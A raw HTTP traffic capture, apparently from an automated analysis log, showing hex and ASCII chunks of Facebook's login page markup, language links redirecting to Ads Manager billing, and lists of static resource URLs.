                                                                                                                                  2022-10-17 20:07:01 UTC250INData Raw: 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20
                                                                                                                                  Data Ascii: /div></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a
                                                                                                                                  2022-10-17 20:07:01 UTC251INData Raw: 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b
                                                                                                                                  Data Ascii: ){return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){
                                                                                                                                  2022-10-17 20:07:01 UTC252INData Raw: 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68
                                                                                                                                  Data Ascii: book.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=h
                                                                                                                                  2022-10-17 20:07:01 UTC254INData Raw: 28 50 6f 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c
                                                                                                                                  Data Ascii: (Portugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieL
                                                                                                                                  2022-10-17 20:07:01 UTC255INData Raw: 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f
                                                                                                                                  Data Ascii: &quot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" o
                                                                                                                                  2022-10-17 20:07:01 UTC257INData Raw: 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61
                                                                                                                                  Data Ascii: ds\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" aja
                                                                                                                                  2022-10-17 20:07:01 UTC258INData Raw: 73 3a 2f 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25
                                                                                                                                  Data Ascii: s://www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%
                                                                                                                                  2022-10-17 20:07:01 UTC260INData Raw: 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c
                                                                                                                                  Data Ascii: _footer" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers<
                                                                                                                                  2022-10-17 20:07:01 UTC261INData Raw: 69 66 22 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70
                                                                                                                                  Data Ascii: if" width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clp
                                                                                                                                  2022-10-17 20:07:01 UTC263INData Raw: 2c 22 31 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 59 59 67 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 6e 52 4d 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 51 33 63 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 56 43 41 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41
                                                                                                                                  Data Ascii: ,"1840809":{"result":false,"hash":"AT5nYctoTsr7alRiYYg"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZnRM"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlmQ3c"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpVCA"},"5541":{"result":true,"hash":"A
                                                                                                                                  2022-10-17 20:07:01 UTC264INData Raw: 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c
                                                                                                                                  Data Ascii: https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\
                                                                                                                                  2022-10-17 20:07:01 UTC266INData Raw: 72 63 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f
                                                                                                                                  Data Ascii: rc.php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/
                                                                                                                                  2022-10-17 20:07:01 UTC267INData Raw: 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c
                                                                                                                                  Data Ascii: _nc_x=Ij3Wp8lg5Kz"},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/F1nWmWaBOeO.js?_nc_x=Ij3Wp8lg5Kz"},"jQ7n\/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},
                                                                                                                                  2022-10-17 20:07:01 UTC269INData Raw: 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 74 6a 51 34 46 48 5a 4e 42 5a 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 68 6d 4d 4b 66 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e
                                                                                                                                  Data Ascii: .fbcdn.net\/rsrc.php\/v3\/y3\/r\/tjQ4FHZNBZI.js?_nc_x=Ij3Wp8lg5Kz"},"yhmMKfP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ivC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.
                                                                                                                                  2022-10-17 20:07:01 UTC270INData Raw: 2f 79 51 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 47 70 61 6b 5c 2f 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 31 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 4e 36 4d 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f
                                                                                                                                  Data Ascii: /yQ\/r\/w4H_1YqgpLv.js?_nc_x=Ij3Wp8lg5Kz"},"2Gpak\/1":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ieXu4\/y1\/l\/en_US\/XN6M9kyaKRX.js?_nc_x=Ij3Wp8lg5Kz"},"iFuPbWh":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/
                                                                                                                                  2022-10-17 20:07:01 UTC272INData Raw: 5f 55 53 5c 2f 49 30 68 4c 78 4b 73 63 6d 71 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 4f 67 53 4a 45 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 6a 69 58 4c 74 37 7a 61 4d 49 70 2e 6a 73 3f 5f
                                                                                                                                  Data Ascii: _US\/I0hLxKscmqy.js?_nc_x=Ij3Wp8lg5Kz"},"cYU3c32":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz"},"3OgSJE4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/jiXLt7zaMIp.js?_
                                                                                                                                  2022-10-17 20:07:01 UTC273INData Raw: 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 62 30 79 30 58 59 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 72 51 4c 34 5c 2f 79 59 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 47 79 74 6b 52 5a 46 4c 42 77 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 72 78 57 58 32 65 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 50 76 56 7a 58 39 45 41 4b 46 61 2e 63 73 73 3f 5f 6e 63
                                                                                                                                  Data Ascii: =Ij3Wp8lg5Kz"},"b0y0XYw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irQL4\/yY\/l\/en_US\/GytkRZFLBwM.js?_nc_x=Ij3Wp8lg5Kz"},"GrxWX2e":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/PvVzX9EAKFa.css?_nc
                                                                                                                                  2022-10-17 20:07:01 UTC274INData Raw: 2f 72 78 75 74 56 6a 51 7a 4f 57 2d 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6e 7a 41 4b 76 4c 79 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 37 5c 2f 72 5c 2f 36 57 50 4a 79 70 35 48 61 30 6a 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 57 46 4d 47 53 39 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 5f 6a 41 34 5c 2f 79 7a 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 61 73 43 69 42 53 75
                                                                                                                                  Data Ascii: /rxutVjQzOW-.css?_nc_x=Ij3Wp8lg5Kz"},"nzAKvLy":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y7\/r\/6WPJyp5Ha0j.js?_nc_x=Ij3Wp8lg5Kz"},"WFMGS9e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i_jA4\/yz\/l\/en_US\/asCiBSu
